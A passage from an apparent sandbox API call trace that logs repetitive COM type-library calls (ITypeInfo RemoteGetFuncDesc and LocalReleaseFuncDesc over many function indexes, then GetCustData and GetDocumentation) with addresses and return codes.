pDummy=0x90) returned 0x0 [0045.251] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.251] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x99, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.251] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.251] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x9a, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.251] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.251] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x9b, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.251] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.252] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x9c, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.252] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.252] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x9d, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.252] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.252] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x9e, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.252] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.252] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x9f, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.252] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.252] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa0, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.252] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.252] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa1, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.252] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.252] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa2, ppFuncDesc=0x2060c8, pDummy=0x140 | out: ppFuncDesc=0x2060c8, pDummy=0x140) returned 0x0 [0045.252] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.252] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa3, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.252] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.252] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa4, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.252] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.252] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa5, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.252] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.252] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa6, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.252] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.252] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa7, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.252] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.252] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa8, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.252] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.252] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa9, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.252] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.252] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xaa, ppFuncDesc=0x2060c8, pDummy=0x140 | out: ppFuncDesc=0x2060c8, pDummy=0x140) returned 0x0 [0045.252] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.252] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xab, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.252] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.252] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xac, ppFuncDesc=0x2060c8, pDummy=0x140 | out: ppFuncDesc=0x2060c8, pDummy=0x140) returned 0x0 [0045.252] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.252] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xad, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.252] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.252] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xae, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.252] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.253] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xaf, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.253] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.253] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb0, ppFuncDesc=0x2060c8, pDummy=0x140 | out: ppFuncDesc=0x2060c8, pDummy=0x140) returned 0x0 [0045.253] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.253] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb1, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.253] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.253] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb2, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.253] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.253] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb3, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.253] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.253] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb4, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.253] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.253] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb5, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.253] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.253] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb6, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.253] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.253] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb7, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.253] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.253] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb8, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.253] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.253] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb9, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.253] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.253] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xba, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.253] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.253] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xbb, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.253] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.253] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xbc, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.253] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.253] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xbd, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.253] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.253] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xbe, ppFuncDesc=0x2060c8, pDummy=0x140 | out: ppFuncDesc=0x2060c8, pDummy=0x140) returned 0x0 [0045.253] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.253] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xbf, ppFuncDesc=0x2060c8, pDummy=0x140 | out: ppFuncDesc=0x2060c8, pDummy=0x140) returned 0x0 [0045.253] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.253] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc0, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.253] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.253] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc1, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.253] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.253] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc2, ppFuncDesc=0x2060c8, pDummy=0x140 | out: ppFuncDesc=0x2060c8, pDummy=0x140) returned 0x0 [0045.253] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.254] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc3, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.254] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.254] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc4, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.254] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.254] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc5, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.254] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.254] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc6, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.254] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.254] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc7, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.254] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.254] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc8, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.254] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.254] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc9, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.254] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.254] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xca, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.254] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.254] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xcb, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.254] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.254] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xcc, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.254] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.254] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xcd, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.254] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.254] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xce, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.254] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.254] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xcf, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.254] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.254] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd0, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.254] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.254] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd1, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.254] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.254] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd2, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.254] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.254] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd3, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.254] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.254] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd4, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.254] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.254] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd5, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.254] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.255] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd6, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.255] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.255] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd7, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.255] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.255] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd8, ppFuncDesc=0x2060c8, pDummy=0x140 | out: ppFuncDesc=0x2060c8, pDummy=0x140) returned 0x0 [0045.255] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.255] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd9, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.255] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.255] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xda, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.255] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.255] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xdb, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.255] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.255] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xdc, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.255] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.255] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xdd, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.255] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.255] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xde, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.255] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.255] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xdf, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.255] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.255] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe0, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.255] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.255] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe1, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.255] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.255] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe2, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.255] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.255] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe3, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.255] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.255] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe4, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.255] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.255] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe5, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.255] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.255] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe6, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.255] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.255] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe7, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.255] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.255] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe8, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.255] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.255] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe9, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.256] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.256] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xea, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.256] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.256] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xeb, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.256] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.256] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xec, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.256] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.256] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xed, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.256] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.256] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xee, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.256] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.256] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xef, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.256] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.256] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf0, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.256] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.256] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf1, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.256] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.256] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf2, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.256] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.256] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf3, ppFuncDesc=0x2060c8, pDummy=0x140 | out: ppFuncDesc=0x2060c8, pDummy=0x140) returned 0x0 [0045.256] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.256] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf4, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.256] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.256] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf5, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.256] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.256] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf6, ppFuncDesc=0x2060c8, pDummy=0x140 | out: ppFuncDesc=0x2060c8, pDummy=0x140) returned 0x0 [0045.256] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.256] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf7, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.256] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.256] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf8, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.256] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.257] ITypeInfo2:GetCustData (in: This=0x7f722f0, GUID=0x7fee403d970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x2060f8 | out: pVarVal=0x2060f8*(varType=0x0, wReserved1=0x0, wReserved2=0x1b8, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0045.257] IUnknown:Release (This=0x7f722f0) returned 0x2 [0045.257] ITypeInfo:RemoteGetDocumentation (in: This=0x7f722f0, memid=-1, refPtrFlags=0x2060f0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0045.257] 